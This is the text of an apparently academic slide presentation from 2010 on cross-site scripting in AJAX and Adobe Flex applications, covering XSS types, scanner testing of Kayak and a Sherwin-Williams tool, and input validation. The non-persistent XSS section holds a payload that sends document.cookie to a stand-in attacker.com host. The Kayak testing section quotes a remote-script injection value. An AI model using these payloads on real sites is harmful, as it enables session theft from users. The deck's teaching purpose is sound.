Cross-Site Scripting (XSS) Cross-Site Scripting (XSS) Vulnerability in AJAX and Adobe Vulnerability in AJAX and Adobe Flex ApplicationsFlex Applications

Danielle Cauthen04/09/2010COMS E6125 – Web enHanced Information Management

What is Cross-Site What is Cross-Site Scripting?Scripting?Cross-Site Scripting, or XSS (not to be

confused with CSS or Cascading Style Sheets), allows attackers to inject client-side script in a web page.

The attacker injects script, such as JavaScript, VBScript, ActiveX, HTML, or Flash into an application to try to get access to sensitive information

Dynamic websites (using AJAX, Flex, for example) are vulnerable. Static websites are not at risk.

Diagram of XSS AttackDiagram of XSS Attack

*From CGISecurity.com

XSS Compared to Other XSS Compared to Other VulnerabilitiesVulnerabilities XSS is the #1 website security issue, with a 66%

percentage likelihood that a website has the vulnerability:

Statistics from WhiteHat Website Security Report, Fall 2009 edition

XSS TypesXSS TypesTwo types of XSS attacks:

◦Nonaltering (or Non Persistent): causes no change to the page functionality

◦Altering (or Persistent): a script injection that can be placed permanently in the database which causes change to the page functionality that will persist each time the page is requested

Non-Altering (Non-Non-Altering (Non-Persistant)Persistant)

Attacker can take a URL that contains personal data, i.e. www.website.com/username=danielle and modify the username field by entering JavaScript to steal the cookie, altering the url to www.website.com/username=<script>document.location='http://attacker.com/cookiesteal.cgi?'+document.cookie</script>

To diminish suspicion attacker can URL encode JavaScript so it’s not apparent

Altering (Persistent)Altering (Persistent)Within a forum, users posts may

be stored in a database, usually being tracked by a session id cookie

An attacker can post a message containing malicious script, that if a user reads, may compromise their account

Threat to AJAXThreat to AJAXBecause of the JavaScript and client-side

scripting of AJAX, its largest security risk is XSSFrom AJAX: The Definitive Guide:

◦ “Before Ajax, any attack made with an XSS vulnerability was done while the user's browser was in a wait state, and it usually coincided with some kind of visual indication by the browser that would give the user reason to think something untoward was happening.

◦ Once Ajax was introduced, this visual cue would disappear, and the user would have no way of knowing whether malicious code was being executed from the browser.”

Threat to Adobe FlexThreat to Adobe FlexThough not as common as with AJAX, Flex has

also been prone to cross-site scripting, especially if HTML and other scripting features are used in a Flex application

However Adobe, realizing the threat, has strict security in place to prevent XSS. ◦ By default, you cannot call script on an HTML

page if the HTML page is not in the same domain as the Flex application.

◦ Since Flex application is compiled into swf, it cannot itself be vulnerable to XSS

◦ The sandbox security model prevents private information being sent elsewhere.

Testing for XSS Testing for XSS VulnerabilitiesVulnerabilitiesAcunetix Web Vulnerability

Scanner – tool that scans web applications for XSS vulnerabilities (more useful with AJAX applications)

HP SWFScan – tool that is helpful in finding security vulnerabilities in Flex/Flash applications. It decompiles and extracts the code from the .swf file, and then analyzes it for vulnerabilities

Testing AJAX ApplicationTesting AJAX ApplicationUsing Acunetix, Kayak.com (the AJAX

web application for travel comparison) was found to have 146 vulnerabilities

Example: when a user clicks on a menu item, such as Flights, that information is submitted as a GET in a variable named tab. Acunetix was able to manipulate this variable numerous times, on one occasion setting tab to <ScRiPt+bad=">"+src="http://testphp.acutenix.com/xss.js?40392"></ScRiPt>

Testing AJAXTesting AJAX

FlexFlexUsing HP SWFScan, tested Flex

application Sherwin Williams Color Visualizer (www.sherwin-williams.com/visualizer)

No XSS vulnerabilities were found

Testing FlexTesting Flex

ConclusionConclusionXSS can be both damaging and costly

while compromising user securityXSS is bigger risk to AJAX, due to the

JavaScript and client-side scriptingFlex is vulnerable but a lot more

resistant due to Adobe security featuresDevelopers of both AJAX and Flex

applications should check and validate any input to ensure it doesn’t include script

ReferencesReferences Acunetix (2010). Web Vulnerability Scanner [Version 6.5]. Retrieved

from http://www.acunetix.com/vulnerability-scanner/download.htm Adobe Systems Incorporated (2004). Cross Site Scripting in Flash.

Retrieved from http://kb2.adobe.com/cps/196/tn_19604.html Adobe Systems Incorporated (2008). Adobe Flex Developer's Guide.

Retrieved from http://livedocs.adobe.com/flex/3/devguide_flex3.pdf Cgisecurity.com (2002, May). The Cross Site Scripting (XSS) FAQ.

Retrieved from http://www.cgisecurity.com/xss-faq.html Hewlett-Packard Development Company, L.P. (2009). SWFScan.

Retrieved from http://www.brothersoft.com/hp-swfscan-253747.html Holdener III, Anthony T. (2008). Ajax: The Definitive Guide.

Sebastopol, CA: O’Reilly Media WhiteHat Security (2009). WhiteHat Website Security Statistics

Report. Retrieved from http://www.whitehatsec.com/home/assets/WPstats_fall09_8th.pdf